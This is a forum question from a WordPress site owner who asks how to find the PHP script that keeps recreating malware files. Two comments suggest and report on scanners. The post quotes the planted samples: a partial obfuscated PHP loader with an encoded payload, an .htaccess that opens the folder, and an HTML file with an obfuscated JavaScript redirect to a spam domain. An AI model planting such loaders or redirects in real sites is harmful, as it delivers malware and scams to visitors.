# How to find the malware PHP script in Wordpress which creates viruses and spam

Tags: wordpress, malware

I have a website and I am using Wordpress (latest version and all plugins updated) as CMS. Two days ago, Google Search Console team informed me about a virus on one of my posts. A cryptic subfolder named `ZxmPeG` placed in the `wp-content` folder has been identified and has the following content:

- .63ec5597b4a4550c25cb25d4b6ba0186400c5cb5 with the content `{"0":46,"4":122,"3":2}`
- .htaccess with the content `DirectoryIndex index.php
  <Files index.php>
  order allow,deny
  allow from all
  </Files>`
- index.php with the content (only partial shown) `<?php
  class Rst { const PLATFORM_UNKNOWN = 0; const PLATFORM_ANDROID = 1; const PLATFORM_APPLE = 2; const PLATFORM_LINUX = 3; const PLATFORM_WINDOWS = 4; private $contentData = '7P0HQJPJ1j+Ox3Xt2AWkq4hKX3qHRRaQLiWEUBdCKIEQqaGz666gSJGWSF/pJBQJhACh7IqAJBQpASEEBAw99F7/ie7ee9/7lvve3/t+//f3/f/3g4d5nnlm5pw5c+Y8M/OMzPvuyx9fVXCPA/4O6oDjgMOjM4CTfxN3nEngY7/fXAIArjKDr5h0eHR0xIqyZD4DMsmCSUd/4v8KLOT/BvAFnPkaANi+0vSXlmXiNACgyKQLACeYE0xaWFr47y0EwMzFAZC4AAA81Ep1YZHiv0/yb3B0dPEfXv8Bwuff908B/hL2X/ty/V+F1/4Nty9WOfN75H8UsjHD9d/DP+J5OQEAP5aVswMAHMyAg/1L/N+HEr+Hkhz/cZjO8aV3ZP5+/98JbzPDF9cBgGpmRh0eAECEef8bx2dR/h3+qPcf/P4e/5lcf4S//V2+v9cnx98xZdX3GFMvAxxf9GLze/6/DyV/f/735fxx/4fe0v+Ov81/Uo9/hL/V939V3v/T8v8z/FEeq37MJvuLvT2K0OyQJlD+8JN/idf+O739gSiOL3a7wAy/AXyxv78t/xHPf33/v4U/yv0Df7QXi48Y4N/bj81/Ylf/CP/IHv/eLv8z/Hfr/5/x+0PP/6if/IE/2vHvw3/0/P9U+Ed7/SP5/9n2+c/wn5XH8s1WTAeaxhwOKDOt/gTgyjHA5zfKn/h/P67e0DIxtjAzMbyhg/CB+0pYQAP97iMCJaRu2PreuHaM/dgNFs6fP8/6/eXnPOv+Xy33n/hfAnOMd4xJXzHpLJN4mcTHJH4mCTDpBpNuMukuk+4xSZhJ4kySZJIUk2SYJMskhd/Hi1trTMxsbQ2u/YG+f3UN/38AJzncxr3sma1xHMbPHBqyu6mcQQE43E7fXgYATx+DPwB87cUk/9PHAOzHYSKwQsezp4/95bHl6WMnv9wALh6HsYr7yyPmFO6faNuDvxXpX3LzJ/4XwRqhnhUDSL1wOybw+r3kjdcf1W6+/uXELSYJvvjlxG0mCb0GADhfv//qOpPYXrz/6l8t8p/43wbLnXwHcP797uy/eXaR+TNzfOb4PyrjIuDr5WBmiPv67DLTTQBOfv2lKF/AuWVV5mUE4Afmz9eaLIPTYP46CWg6xgYQABwdY71+NI5fAlwC/Nh8hflUC+AE8Aa4MXN6A/yZ10wfBLi1wnrSxEz7PaCJKcsPxzSY5bMWBi4t/z7I/EEacGr5ITPF8a+fXyOWzHk+8dHpGVvymCoaPgKIHfti6t99Tqr79fc3eZZvMyP+PmX9sb/W6Njv9OL2F1plRR4GHoObEr2+krqUsbESib2V/1WexfufH0t+mzPBOZN4K1FI5Pbhj1cOP85Z6LUNvrdNkSj+0cYlbPzRj0Llrb4yxM2MX87f1gX4r4N/5EbeEs/6sUym9WH3ma/P9FwyGpBpKhJJmHU4MXDqp9Zz4cWTCaIuX5kqVYoJmioL9aZgPrib/xpOSA3KAhlzKgVx4mu3UjHa33sZL4XRDW/ZrZQTVc41vJ/lv/M9+Gklmift5yhuH6fXZDXG60dPZu5zoObbD8BWtkTpDK6RfTh9bJB/zN11daPS0AYrpc5pkj50GOT7QKMaqo7/pphvmEvm`

If the link is directly accessed, a word document (extension .doc) is downloaded.

Next, in the root folder of the Wordpress installation, there is another cryptic html file named `csvjsjd.html` with the content

```
<html>
<head>
        <script>
                var fovxy = "n";
                window.location.href = "https://newdiscount.zo" + fovxy + "e/?tr=13058";
        </script>
</head>
<body>
</body>
</html>
<!-- 6c3f8b203473a9e45d8471d5072119a9 -->
```

If I delete the folder and files, they are recreated within a couple of minutes.

I have root access to my VPS and I have run the following tools to verify that no rootkit is installed:

1. Lynis
2. Chkrootkit
3. Rkhunter

My system is clean. I assume it is related to Wordpress only because once I stopped Apache2, the files are not recreated. Also, I have not found no other strange looking objects somewhere else on my Debian 9.9 machine.

I have tried to disable all WP plugins. The problem still remains.

Next, I used auditctl to watch the files. From the log file, I just could see that there are lot of foreign IP addresses accessing the files. But I was not able to identify the process which is responsible of creating those files.

Do you know any tools to trace the PHP script which is causing that malware?

Thanks a lot!

Comment: Run a scan either with Sucuri or Wordfence. Might help identify what's causing this.

Comment: Wordfence didn't find anything, even the pro version (tested it within the trial). Sucuri doesn't seem to offer trials and it is too expensive. Is there anything else I can try to get to the bottom of this? I don't want to setup everything from scratch.